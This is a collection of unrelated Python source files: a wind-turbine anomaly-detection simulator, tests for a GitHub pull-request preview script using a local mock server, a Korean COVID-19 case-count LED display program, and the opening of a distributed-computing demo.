create_object()
thread = threading.Thread(target=create_object)
thread.start()
thread.join()
self.assertEqual(models.Object.objects.count(), 2)
|
windfarm.py
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
import threading
import math
import random
import pywt
import numpy as np
import logging
import time
import os
from turbine import WindTurbine
from edgeagentclient import EdgeAgentClient
from ota import OTAModelUpdate
class WindTurbineFarm(object):
"""
This is the application class. It is respoisible for:
- Creating virtual edge devices (as threads)
- Launch one Edge Agent in each virtual device
- Load the Anomaly detection for the Wind Turbine in the Edge Agent
- Launch the Virtual Wind Turbines
- Launch a Edge Agent Client that integrates the Wind Turbine with the Edge Device
- Display the UI
"""
def __init__(self, simulator, mqtt_host, mqtt_port):
if simulator is None:
raise Exception("You need to pass the simulator as argument")
self.simulator = simulator
self.n_turbines = simulator.get_num_turbines()
self.mqtt_host = mqtt_host
self.mqtt_port = mqtt_port
## launch edge agent clients
self.edge_agents = [EdgeAgentClient('/tmp/agent%d' % i) for i in range(self.n_turbines)]
self.model_meta = [{'model_name':None} for i in range(self.n_turbines)]
self.ota_devices = []
# we need to load the statistics computed in the data prep notebook
# these statistics will be used to compute normalize the input
self.raw_std = np.load('../../../statistics/raw_std.npy')
self.mean = np.load('../../../statistics/mean.npy')
self.std = np.load('../../../statistics/std.npy')
# then we load the thresholds computed in the training notebook
# for more info, take a look on the Notebook #2
self.thresholds = np.load('../../../statistics/thresholds.npy')
# configurations to format the time based data for the anomaly detection model
# If you change these parameters you need to retrain your model with the new parameters
self.INTERVAL = 5 # seconds
self.TIME_STEPS = 20 * self.INTERVAL # 50ms -> seg: 50ms * 20
self.STEP = 10
# these are the features used in this application
self.feature_ids = [8,9,10,7, 22, 5, 6] # qX,qy,qz,qw ,wind_seed_rps, rps, voltage
self.n_features = 6 # roll, pitch, yaw, wind_speed, rotor_speed, voltage
self.running = False # running status
# minimal buffer length for denoising. We need to accumulate some sample before denoising
self.min_num_samples = 500
def __create_dataset__(self, X, time_steps=1, step=1):
"""
This encodes a list of readings into the correct shape
expected by the model. It uses the concept of a sliding window
"""
Xs = []
for i in range(0, len(X) - time_steps, step):
v = X[i:(i + time_steps)]
Xs.append(v)
return np.array(Xs)
def __euler_from_quaternion__(self, x, y, z, w):
"""
Convert a quaternion into euler angles (roll, pitch, yaw)
roll is rotation around x in radians (counterclockwise)
pitch is rotation around y in radians (counterclockwise)
yaw is rotation around z in radians (counterclockwise)
"""
t0 = +2.0 * (w * x + y * z)
t1 = +1.0 - 2.0 * (x * x + y * y)
roll_x = math.atan2(t0, t1)
t2 = +2.0 * (w * y - z * x)
t2 = +1.0 if t2 > +1.0 else t2
t2 = -1.0 if t2 < -1.0 else t2
pitch_y = math.asin(t2)
t3 = +2.0 * (w * z + x * y)
t4 = +1.0 - 2.0 * (y * y + z * z)
yaw_z = math.atan2(t3, t4)
return roll_x, pitch_y, yaw_z # in radians
def __wavelet_denoise__(self, data, wavelet, noise_sigma):
'''
Filter accelerometer data using wavelet denoising
Modification of F. Blanco-Silva's code at: https://goo.gl/gOQwy5
'''
wavelet = pywt.Wavelet(wavelet)
levels = min(5, (np.floor(np.log2(data.shape[0]))).astype(int))
# Francisco's code used wavedec2 for image data
wavelet_coeffs = pywt.wavedec(data, wavelet, level=levels)
threshold = noise_sigma*np.sqrt(2*np.log2(data.size))
new_wavelet_coeffs = map(lambda x: pywt.threshold(x, threshold, mode='soft'), wavelet_coeffs)
return pywt.waverec(list(new_wavelet_coeffs), wavelet)
def __del__(self):
"""Destructor"""
self.halt()
def __data_prep__(self, turbine_id, buffer):
"""
This method is called for each reading.
Here we do some data prep and accumulate the data in the buffer
for denoising
"""
new_buffer = []
for data in buffer:
roll,pitch,yaw = self.__euler_from_quaternion__(
data[self.feature_ids[0]],data[self.feature_ids[1]],
data[self.feature_ids[2]],data[self.feature_ids[3]]
)
row = [roll,pitch,yaw, data[self.feature_ids[4]],data[self.feature_ids[5]], data[self.feature_ids[6]]]
new_buffer.append(row)
return np.array(new_buffer)
def __detect_anomalies__(self):
"""
Keeps processing the data collected from the turbines
and do anomaly detection. It reports to each turbine the
anomalies detected (through a callback)
"""
while self.running:
# for each turbine, check the buffer
start_time = time.time()
for idx in range(self.n_turbines):
if self.simulator.is_turbine_running(idx):
buffer = self.simulator.get_raw_data(idx)
if len(buffer) >= self.min_num_samples:
self.simulator.update_dashboard(idx, np.array(buffer))
# create a copy & prep the data
data = self.__data_prep__(idx, np.array(buffer) )
if not self.edge_agents[idx].is_model_loaded(self.model_meta[idx]['model_name']):
self.simulator.update_label(idx, 'Model not loaded')
continue
# denoise
data = np.array([self.__wavelet_denoise__(data[:,i], 'db6', self.raw_std[i]) for i in range(self.n_features)])
data = data.transpose((1,0))
# normalize
data -= self.mean
data /= self.std
data = data[-(self.TIME_STEPS+self.STEP):]
# create the dataset and reshape it
x = self.__create_dataset__(data, self.TIME_STEPS, self.STEP)
x = np.transpose(x, (0, 2, 1)).reshape(x.shape[0], self.n_features, 10, 10)
# run the model
p = self.edge_agents[idx].predict(self.model_meta[idx]['model_name'], x)
if p is not None:
a = x.reshape(x.shape[0], self.n_features, 100).transpose((0,2,1))
b = p.reshape(p.shape[0], self.n_features, 100).transpose((0,2,1))
# check the anomalies
pred_mae_loss = np.mean(np.abs(b - a), axis=1).transpose((1,0))
values = np.mean(pred_mae_loss, axis=1)
anomalies = (values > self.thresholds)
self.simulator.detected_anomalies(idx, values, anomalies)
elapsed_time = time.time() - start_time
time.sleep(0.5-elapsed_time)
def notify_model_update(self, device_id, model_name, model_version):
logging.info("Loading model %s version %f in device %d" % ( model_name, model_version, device_id))
model_path = 'agent/model/%d/%s/%s' % (device_id, model_name, str(model_version))
if self.edge_agents[device_id].is_model_loaded(model_name):
if model_version > self.model_meta[device_id]['model_version']:
logging.info("Unloading old model: %s v: %s" % (model_name, str(model_version) ) )
self.edge_agents[device_id].unload_model(model_name)
self.simulator.update_label(device_id, "Model unloaded: %.01f" % self.model_meta[device_id]['model_version'])
else:
logging.info("New model is equals to the previous")
return
ret = self.edge_agents[device_id].load_model(model_name, model_path)
if ret is not None:
self.model_meta[device_id]['model_name'] = model_name
self.model_meta[device_id]['model_path'] = model_path
self.model_meta[device_id]['model_version'] = model_version
self.simulator.update_label(device_id, 'Model Loaded: %.01f' % model_version)
def start(self):
"""
Run the main application by creating the Edge Agents, loading the model and
kicking-off the anomaly detector program
"""
if not self.running:
self.running = True
for i in range(self.n_turbines):
self.ota_devices.append(OTAModelUpdate(i, 'edge-device-%d' % i,
self.mqtt_host, self.mqtt_port, self.notify_model_update))
logging.info("Starting the anomaly detector loop...")
# finally start the anomaly detection loop
self.processing = threading.Thread(target=self.__detect_anomalies__)
self.processing.start()
def halt(self):
"""
Destroys the application and halts the agents & turbines
"""
if self.running:
self.running = False
self.processing.join()
self.simulator.halt()
for o in self.ota_devices: del o
self.ota_devices = []
# stop the anomaly detector
self.processing.join()
|
test_update_pr_preview.py
|
import BaseHTTPServer
import json
import os
import subprocess
import tempfile
import threading
subject = os.path.join(
os.path.dirname(os.path.abspath(__file__)), '..', 'update_pr_preview.py'
)
test_host = 'localhost'
class MockHandler(BaseHTTPServer.BaseHTTPRequestHandler, object):
def do_all(self):
request = (self.command, self.path)
self.server.requests.append(request)
status_code, body = self.server.responses.get(request, (200, '{}'))
self.send_response(status_code)
self.end_headers()
self.wfile.write(body)
def do_DELETE(self):
return self.do_all()
def do_GET(self):
return self.do_all()
def do_PATCH(self):
return self.do_all()
def do_POST(self):
return self.do_all()
class MockServer(BaseHTTPServer.HTTPServer, object):
'''HTTP server that responds to all requests with status code 200 and body
'{}' unless an alternative status code and body are specified for the given
method and path in the `responses` parameter.'''
def __init__(self, address, responses=None):
super(MockServer, self).__init__(address, MockHandler)
self.responses = responses or {}
self.requests = []
def assert_success(returncode):
assert returncode == 0
def assert_neutral(returncode):
assert returncode == 78
def assert_fail(returncode):
assert returncode not in (0, 78)
def run(event_data, responses=None):
event_data_file = tempfile.mkstemp()[1]
env = {
'GITHUB_EVENT_PATH': event_data_file,
'GITHUB_REPOSITORY': 'test-org/test-repo'
}
env.update(os.environ)
server = MockServer((test_host, 0), responses)
test_port = server.server_address[1]
threading.Thread(target=lambda: server.serve_forever()).start()
try:
with open(event_data_file, 'w') as handle:
json.dump(event_data, handle)
child = subprocess.Popen(
['python', subject, 'http://{}:{}'.format(test_host, test_port)],
env=env
)
child.communicate()
finally:
server.shutdown()
os.remove(event_data_file)
return child.returncode, server.requests
def default_data(action):
return {
'pull_request': {
'number': 543,
'closed_at': None,
'head': {
'sha': 'deadbeef'
},
'user': {
'login': 'rms'
},
'labels': [
{'name': 'foo'},
{'name': 'bar'}
]
},
'action': action
}
def test_close_active_with_label():
event_data = default_data('closed')
event_data['pull_request']['closed_at'] = '2019-07-05'
event_data['pull_request']['labels'].append(
{'name': 'pull-request-has-preview'}
)
delete_label = (
'DELETE',
'/repos/test-org/test-repo/issues/543/labels/pull-request-has-preview'
)
delete_tag = (
'DELETE', '/repos/test-org/test-repo/git/refs/tags/pr_preview_543'
)
returncode, requests = run(event_data)
assert_success(returncode)
assert delete_label in requests
assert delete_tag in requests
def test_close_active_with_label_error():
event_data = default_data('closed')
event_data['pull_request']['closed_at'] = '2019-07-05'
event_data['pull_request']['labels'].append(
{'name': 'pull-request-has-preview'}
)
responses = {(
'DELETE',
'/repos/test-org/test-repo/issues/543/labels/pull-request-has-preview'
): (500, '{}')}
returncode, requests = run(event_data, responses)
assert_fail(returncode)
def test_close_active_without_label():
event_data = default_data('closed')
event_data['pull_request']['closed_at'] = '2019-07-05'
returncode, requests = run(event_data)
assert_neutral(returncode)
assert len(requests) == 0
def test_open_with_label():
event_data = default_data('opened')
event_data['pull_request']['labels'].append(
{'name': 'pull-request-has-preview'}
)
returncode, requests = run(event_data)
assert_success(returncode)
expected = (
'PATCH',
'/repos/test-org/test-repo/git/refs/tags/pr_preview_543'
)
assert expected in requests
def test_open_without_label_for_collaborator():
event_data = default_data('opened')
responses = {
('GET', '/repos/test-org/test-repo/collaborators/rms'): (204, ''),
('GET', '/repos/test-org/test-repo/git/refs/tags/pr_preview_543'):
(404, '{}')
}
returncode, requests = run(event_data, responses)
assert_success(returncode)
create_label = ('POST', '/repos/test-org/test-repo/issues/543/labels')
create_tag = ('POST', '/repos/test-org/test-repo/git/refs')
assert responses.keys()[0] in requests
assert responses.keys()[1] in requests
assert create_label in requests
assert create_tag in requests
def test_open_without_label_for_non_collaborator():
event_data = default_data('opened')
responses = {
('GET', '/repos/test-org/test-repo/collaborators/rms'): (404, '{}')
}
returncode, requests = run(event_data, responses)
assert_neutral(returncode)
expected = [(
'GET', '/repos/test-org/test-repo/collaborators/rms'
)]
assert expected == requests
def test_add_unrelated_label():
event_data = default_data('labeled')
event_data['label'] = {'name': 'foobar'}
event_data['pull_request']['labels'].append({'name': 'foobar'})
returncode, requests = run(event_data)
assert_neutral(returncode)
assert len(requests) == 0
def test_add_active_label():
event_data = default_data('labeled')
event_data['label'] = {'name': 'pull-request-has-preview'}
event_data['pull_request']['labels'].append(
{'name': 'pull-request-has-preview'}
)
responses = {(
'GET', '/repos/test-org/test-repo/git/refs/tags/pr_preview_543'
): (404, '{}')}
returncode, requests = run(event_data, responses)
assert_success(returncode)
expected = ('POST', '/repos/test-org/test-repo/git/refs')
assert responses.keys()[0] in requests
assert expected in requests
def test_remove_unrelated_label():
event_data = default_data('unlabeled')
event_data['label'] = {'name': 'foobar'}
returncode, requests = run(event_data)
assert_neutral(returncode)
assert len(requests) == 0
def test_remove_active_label():
event_data = default_data('unlabeled')
event_data['label'] = {'name': 'pull-request-has-preview'}
responses = {
('DELETE', '/repos/test-org/test-repo/git/refs/tags/pr_preview_543'):
(204, '')
}
returncode, requests = run(event_data, responses)
assert_success(returncode)
assert responses.keys()[0] in requests
def test_synchronize_without_label():
event_data = default_data('synchronize')
returncode, requests = run(event_data)
assert_neutral(returncode)
assert len(requests) == 0
def test_synchronize_with_label():
event_data = default_data('synchronize')
event_data['pull_request']['labels'].append(
{'name': 'pull-request-has-preview'}
)
returncode, requests = run(event_data)
assert_success(returncode)
expected = (
'PATCH',
'/repos/test-org/test-repo/git/refs/tags/pr_preview_543'
)
assert expected in requests
def test_unrecognized_action():
event_data = default_data('assigned')
returncode, requests = run(event_data)
assert_neutral(returncode)
assert len(requests) == 0
|
main_color.py
|
import json
import crawlKoreaData_All as crawl1
import crawlKoreaData_Gyeonggi as crawl2
import crawlKoreaData_Seoul as crawl3
import LED_Display as LMD
import threading
from datetime import date, timedelta
import datetime
from matrix import *
today = date.today()
oneday = datetime.timedelta(days=1)
yesterday = today - oneday
third = today - oneday - oneday
a = str(today)
b = str(yesterday)
c = str(third)
def LED_init():
thread=threading.Thread(target=LMD.main, args=())
thread.setDaemon(True)
thread.start()
return
crawl1.run()
crawl2.run()
crawl3.run()
def draw_matrix(array):
for x in range(16):
for y in range(32):
if array[x][y] == 1:
LMD.set_pixel(x,y,4) #blue
elif array[x][y] == 2:
LMD.set_pixel(x,y,3) #yellow
elif array[x][y] == 3:
LMD.set_pixel(x,y,1) #red
elif array[x][y] == 4:
LMD.set_pixel(x,y,2) #green
elif array[x][y] == 0:
LMD.set_pixel(x,y,0)
else:
continue
print()
array_screen = [
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]]
number_array = [
[[1,1,1,0],
[1,0,1,0],
[1,0,1,0],
[1,0,1,0],
[1,1,1,0]], #0
[[0,1,0,0],
[0,1,0,0],
[0,1,0,0],
[0,1,0,0],
[0,1,0,0]], #1
[[1,1,1,0],
[0,0,1,0],
[1,1,1,0],
[1,0,0,0],
[1,1,1,0]], #2
[[1,1,1,0],
[0,0,1,0],
[1,1,1,0],
[0,0,1,0],
[1,1,1,0]], #3
[[1,0,1,0],
[1,0,1,0],
[1,1,1,0],
[0,0,1,0],
[0,0,1,0]], #4
[[1,1,1,0],
[1,0,0,0],
[1,1,1,0],
[0,0,1,0],
[1,1,1,0]], #5
[[1,1,1,0],
[1,0,0,0],
[1,1,1,0],
[1,0,1,0],
[1,1,1,0]], #6
[[1,1,1,0],
[0,0,1,0],
[0,1,0,0],
[0,1,0,0],
[0,1,0,0]], #7
[[1,1,1,0],
[1,0,1,0],
[1,1,1,0],
[1,0,1,0],
[1,1,1,0]], #8
[[1,1,1,0],
[1,0,1,0],
[1,1,1,0],
[0,0,1,0],
[0,0,1,0]], #9
]
number_array_1 = [
[[1,1,1,0],
[1,0,1,0],
[1,0,1,0],
[1,0,1,0],
[1,1,1,0]], #0
[[0,1,0,0],
[0,1,0,0],
[0,1,0,0],
[0,1,0,0],
[0,1,0,0]], #1
[[1,1,1,0],
[0,0,1,0],
[1,1,1,0],
[1,0,0,0],
[1,1,1,0]], #2
[[1,1,1,0],
[0,0,1,0],
[1,1,1,0],
[0,0,1,0],
[1,1,1,0]], #3
[[1,0,1,0],
[1,0,1,0],
[1,1,1,0],
[0,0,1,0],
[0,0,1,0]], #4
[[1,1,1,0],
[1,0,0,0],
[1,1,1,0],
[0,0,1,0],
[1,1,1,0]], #5
[[1,1,1,0],
[1,0,0,0],
[1,1,1,0],
[1,0,1,0],
[1,1,1,0]], #6
[[1,1,1,0],
[0,0,1,0],
[0,1,0,0],
[0,1,0,0],
[0,1,0,0]], #7
[[1,1,1,0],
[1,0,1,0],
[1,1,1,0],
[1,0,1,0],
[1,1,1,0]], #8
[[1,1,1,0],
[1,0,1,0],
[1,1,1,0],
[0,0,1,0],
[0,0,1,0]] #9
]
number_array_2 = [ #yellow
[[2, 2, 2, 0],
[2, 0, 2, 0],
[2, 0, 2, 0],
[2, 0, 2, 0],
[2, 2, 2, 0]], # 0
[[0, 2, 0, 0],
[0, 2, 0, 0],
[0, 2, 0, 0],
[0, 2, 0, 0],
[0, 2, 0, 0]], # 1
[[2, 2, 2, 0],
[0, 0, 2, 0],
[2, 2, 2, 0],
[2, 0, 0, 0],
[2, 2, 2, 0]], # 2
[[2, 2, 2, 0],
[0, 0, 2, 0],
[2, 2, 2, 0],
[0, 0, 2, 0],
[2, 2, 2, 0]], # 3
[[2, 0, 2, 0],
[2, 0, 2, 0],
[2, 2, 2, 0],
[0, 0, 2, 0],
[0, 0, 2, 0]], # 4
[[2, 2, 2, 0],
[2, 0, 0, 0],
[2, 2, 2, 0],
[0, 0, 2, 0],
[2, 2, 2, 0]], # 5
[[2, 2, 2, 0],
[2, 0, 0, 0],
[2, 2, 2, 0],
[2, 0, 2, 0],
[2, 2, 2, 0]], # 6
[[2, 2, 2, 0],
[0, 0, 2, 0],
[0, 2, 0, 0],
[0, 2, 0, 0],
[0, 2, 0, 0]], # 7
[[2, 2, 2, 0],
[2, 0, 2, 0],
[2, 2, 2, 0],
[2, 0, 2, 0],
[2, 2, 2, 0]], # 8
[[2, 2, 2, 0],
[2, 0, 2, 0],
[2, 2, 2, 0],
[0, 0, 2, 0],
[0, 0, 2, 0]] # 9
]
number_array_3 = [ #red
[[3, 3, 3, 0],
[3, 0, 3, 0],
[3, 0, 3, 0],
[3, 0, 3, 0],
[3, 3, 3, 0]], # 0
[[0, 3, 0, 0],
[0, 3, 0, 0],
[0, 3, 0, 0],
[0, 3, 0, 0],
[0, 3, 0, 0]], # 1
[[3, 3, 3, 0],
[0, 0, 3, 0],
[3, 3, 3, 0],
[3, 0, 0, 0],
[3, 3, 3, 0]], # 2
[[3, 3, 3, 0],
[0, 0, 3, 0],
[3, 3, 3, 0],
[0, 0, 3, 0],
[3, 3, 3, 0]], # 3
[[3, 0, 3, 0],
[3, 0, 3, 0],
[3, 3, 3, 0],
[0, 0, 3, 0],
[0, 0, 3, 0]], # 4
[[3, 3, 3, 0],
[3, 0, 0, 0],
[3, 3, 3, 0],
[0, 0, 3, 0],
[3, 3, 3, 0]], # 5
[[3, 3, 3, 0],
[3, 0, 0, 0],
[3, 3, 3, 0],
[3, 0, 3, 0],
[3, 3, 3, 0]], # 6
[[3, 3, 3, 0],
[0, 0, 3, 0],
[0, 3, 0, 0],
[0, 3, 0, 0],
[0, 3, 0, 0]], # 7
[[3, 3, 3, 0],
[3, 0, 3, 0],
[3, 3, 3, 0],
[3, 0, 3, 0],
[3, 3, 3, 0]], # 8
[[3, 3, 3, 0],
[3, 0, 3, 0],
[3, 3, 3, 0],
[0, 0, 3, 0],
[0, 0, 3, 0]]
]
number_array_4 = [ #green
[[4, 4, 4, 0],
[4, 0, 4, 0],
[4, 0, 4, 0],
[4, 0, 4, 0],
[4, 4, 4, 0]], # 0
[[0, 4, 0, 0],
[0, 4, 0, 0],
[0, 4, 0, 0],
[0, 4, 0, 0],
[0, 4, 0, 0]], # 1
[[4, 4, 4, 0],
[0, 0, 4, 0],
[4, 4, 4, 0],
[4, 0, 0, 0],
[4, 4, 4, 0]], # 2
[[4, 4, 4, 0],
[0, 0, 4, 0],
[4, 4, 4, 0],
[0, 0, 4, 0],
[4, 4, 4, 0]], # 3
[[4, 0, 4, 0],
[4, 0, 4, 0],
[4, 4, 4, 0],
[0, 0, 4, 0],
[0, 0, 4, 0]], # 4
[[4, 4, 4, 0],
[4, 0, 0, 0],
[4, 4, 4, 0],
[0, 0, 4, 0],
[4, 4, 4, 0]], # 5
[[4, 4, 4, 0],
[4, 0, 0, 0],
[4, 4, 4, 0],
[4, 0, 4, 0],
[4, 4, 4, 0]], # 6
[[4, 4, 4, 0],
[0, 0, 4, 0],
[0, 4, 0, 0],
[0, 4, 0, 0],
[0, 4, 0, 0]], # 7
[[4, 4, 4, 0],
[4, 0, 4, 0],
[4, 4, 4, 0],
[4, 0, 4, 0],
[4, 4, 4, 0]], # 8
[[4, 4, 4, 0],
[4, 0, 4, 0],
[4, 4, 4, 0],
[0, 0, 4, 0],
[0, 0, 4, 0]]
]
covid_array = [
[[0, 1, 1, 1, 1],
[1, 0, 0, 0, 0],
[1, 0, 0, 0, 0],
[1, 0, 0, 0, 0],
[0, 1, 1, 1, 1]], # C
[[0, 1, 1, 1, 0],
[1, 0, 0, 0, 1],
[1, 0, 0, 0, 1],
[1, 0, 0, 0, 1],
[0, 1, 1, 1, 0]], # O
[[1, 0, 0, 0, 1],
[1, 0, 0, 0, 1],
[0, 1, 0, 1, 0],
[0, 0, 1, 0, 0],
[0, 0, 1, 0, 0]], # V
[[0, 1, 1, 1, 0],
[0, 0, 1, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 1, 0, 0],
[0, 1, 1, 1, 0]], # I
[[1, 1, 1, 0, 0],
[1, 0, 0, 1, 0],
[1, 0, 0, 1, 0],
[1, 0, 0, 1, 0],
[1, 1, 1, 0, 0]] # D
]
arrow_array = [
[[0,1,0],
[1,1,1],
[0,1,0],
[0,1,0],
[0,1,0]]
]
LED_init()
draw_matrix(array_screen); print()
def compare_data(js_file1, js_file2, search_region ,confirmed_cmp, array):
with open(js_file1, "r", encoding="utf-8") as f1:
with open(js_file2, "r", encoding="utf-8") as f2:
json_data_1 = json.load(f1)
json_data_2 = json.load(f2)
for i in range(0, len(json_data_1) - 1):
region = json_data_1[i]['지역이름']
confirmed_1 = json_data_1[i]['확진자수']
confirmed_2 = json_data_2[i]['확진자수']
cmp_data = confirmed_1 - confirmed_2
confirmed_cmp.append({
'지역이름' : region,
'전날비교' : cmp_data
})
for i in range(0,len(confirmed_cmp)):
if (confirmed_cmp[i]['지역이름']) == search_region:
if confirmed_cmp[i]['전날비교'] > 5:
list_1 = [int(i) for i in str(confirmed_cmp[i]['전날비교'])]
for j in range(0,len(list_1)):
for x in range(5):
for y in range(19+4*j, 23+4*j):
array[x][y] = number_array_3[list_1[j]][x][y-19-4*j]
number_array_3[list_1[j]][x][y - 19 - 4 * j] == 3
for x in range(5):
for y in range(19 + 4 * len(list_1), 19 + 4 * len(list_1) + 3): # 31~34
array[x][y] = arrow_array[0][x][y - 19 - 4 * len(list_1)]
elif confirmed_cmp[i]['전날비교'] > 2 and confirmed_cmp[i]['전날비교'] <= 5:
list_2 = [int(i) for i in str(confirmed_cmp[i]['전날비교'])]
for j in range(0, len(list_2)):
for x in range(5):
for y in range(19 + 4 * j, 23 + 4 * j):
array[x][y] = number_array_2[list_2[j]][x][y - 19 - 4 * j]
number_array_2[list_2[j]][x][y - 19 - 4 * j] == 2
for x in range(5):
for y in range(19 + 4 * len(list_2), 19 + 4 * len(list_2) + 3): # 31~34
array[x][y] = arrow_array[0][x][y - 19 - 4 * len(list_2)]
elif confirmed_cmp[i]['전날비교'] >= 0 and confirmed_cmp[i]['전날비교'] <= 2:
list_3 = [int(i) for i in str(confirmed_cmp[i]['전날비교'])]
for j in range(0, len(list_3)):
for x in range(5):
for y in range(19 + 4 * j, 23 + 4 * j):
array[x][y] = number_array_4[list_3[j]][x][y - 19 - 4 * j]
number_array_4[list_3[j]][x][y - 19 - 4 * j] == 4
for x in range(5):
for y in range(19+4*len(list_3),19+4*len(list_3)+3): #31~34
array[x][y] = arrow_array[0][x][y-19-4*len(list_3)]
return confirmed_cmp
# 지역별 확진자 수 검색 함수 (LED구현)
def search_count(js_file,search_region,array):
with open (js_file,"r",encoding="utf-8") as f:
json_data = json.load(f)
for i in range(0,len(json_data)-1):
if (json_data[i]['지역이름']) == search_region:
print(json_data[i]['확진자수'])
list =[int(i) for i in str(json_data[i]['확진자수'])]
for j in range(0,len(list)):
for x in range(5):
for y in range(0+4*j,4+4*j):
array[x][y] = number_array[list[j]][x][y-4*j]
def main_UI(array):
for j in range(0,5):
for x in range(2,7):
for y in range(1+4*j,5+4*j):
array[x][y] = covid_array[j][x-2][y-4*j-1]
def all_count(js_file,array):
with open (js_file,"r",encoding="utf-8") as f:
json_data = json.load(f)
list = [int(i) for i in str(json_data[0]['확진자수'])]
for j in range(0,len(list)):
for x in range(10,15):
for y in range(1+4*j,5+4*j):
array[x][y] = number_array[list[j]][x-10][y-4*j-1]
# 지역별 전날대비 확진자 수 증감 검색 함수
def count_change(js_file,search_region):
with open (js_file,"r",encoding="utf-8") as f:
json_data = json.load(f)
for i in range(0,len(json_data)-1):
if (json_data[i]['지역이름']) == search_region:
return json_data[i]['전날비교']
def clear_array(array):
for i in range(16):
for j in range(32):
array[i][j] = 0
main_menu = 0
menu = 1
while(menu):
print("*****Menu*****")
print("1.All")
print("2.Seoul")
print("3.Gyeonggi")
print("4.Exit")
print("**************")
if main_menu == 0:
main_UI(array_screen)
file = 'koreaData_All' + '_' + a + '.js'
all_count(file, array_screen)
draw_matrix(array_screen);print()
compare_cmp = []
menu_choice = int(input("Select menu: "))
# while > 뒤로가기 입력전까지 menu 반복시행
while menu_choice == 1: # 전국 확진자 수 검색
js_file = 'koreaData_All'+ '_'+ a +'.js'
js_file_yesterday = 'koreaData_All'+ '_'+ c +'.js'
search_region = input("지역을 입력하세요 (ex:서울): ")
clear_array(array_screen)
draw_matrix(array_screen);print()
search_count(js_file,search_region,array_screen)
compare_data(js_file,js_file_yesterday,search_region,compare_cmp,array_screen)
draw_matrix(array_screen);print()
if search_region == '0': # 0을 입력하면 메뉴로 복귀
compare_cmp = []
main_menu = 0
break
while menu_choice == 2: # 서울 세부지역 확진자 수 검색
js_file = 'koreaData_Seoul'+ '_' + a + '.js'
js_file_yesterday = 'koreaData_Seoul'+ '_' + c + '.js'
search_region = input("지역을 입력하세요 (ex:종로구): ")
clear_array(array_screen)
draw_matrix(array_screen);print()
search_count(js_file,search_region,array_screen)
compare_data(js_file, js_file_yesterday, search_region, compare_cmp, array_screen)
draw_matrix(array_screen);print()
if search_region == '0': # 0을 입력하면 메뉴로 복귀
compare_cmp = []
main_menu = 0
break
while menu_choice == 3: # 경기 세부지역 확진자 수 검색
js_file = 'koreaData_Gyeonggi'+ '_'+ a + '.js'
js_file_yesterday = 'koreaData_Gyeonggi'+ '_'+ c + '.js'
search_region = input("지역을 입력하세요 (ex:수원): ")
clear_array(array_screen)
draw_matrix(array_screen);print()
search_count(js_file,search_region,array_screen)
compare_data(js_file, js_file_yesterday, search_region, compare_cmp, array_screen)
draw_matrix(array_screen);print()
#print(str(count_change(js_file,search_region)),"명 증가")
if search_region == '0': # 0을 입력하면 메뉴로 복귀
compare_cmp = []
main_menu = 0
break
if menu_choice == 4: # 메뉴 종료
menu = 0
|
demo.py
|
#!/usr/bin/python3
"""
This file is provided as a demonstration tool for using pystributor
"""
from pystributor.pystributor import Hub, Worker
from time import perf_counter
from os import system, name
import multiprocessing
from multiprocessing.managers import BaseManager
SAMPLE_ARGS = [(i,) for i in range(10**8, (10**8)+200)]
SAMPLE_TASK = """
def task(my_argument):
# When creating your own task, always name it task
def _my_bad_prime_number_checker(number):
# Returns true if prime, false otherwise
if number <= 1:
return False
for i in range(2, number):
if (number % i) == 0:
return False
return True
return _my_bad_prime_number_checker(my_argument)
"""
def _worker_helper():
"""This helper must be placed in this scope for windows compability"""
worker = Worker()
worker.start()
def main():
print("This python file is provided as a demo which uses pystributor to")
print("perform an example task. Different systems will have different")
print("performance characteristics. This will affect much performance")
print("can be gained by using pystributor. Certain tasks will perform")
print("worse with pystributor due to increased overhead.")
print()
print("If you test your own tasks, the most benefit will likely be")
print("gained for tasks that have a moderate amount of argument sets to")
print("distribute (in order of 100s or 1000s). Each argument should")
print("be maximally CPU intensive when processed on worker.")
print("")
print("You should take a look inside this demo file after trying it out.")
print("")
print("")
print("")
while True:
print("Enter H to start a hub. Enter W to start worker(s)")
print("(You will have to start at least two instances of this demo,")
print("one for hub and one for workers)")
inp = input(": ")
if inp == "H":
while True: # loop for valid input
worker_count = input("Please enter how many worker connections to wait for: ")
try:
worker_count = int(worker_count)
if worker_count <= 0:
continue
except ValueError:
pass
else:
break
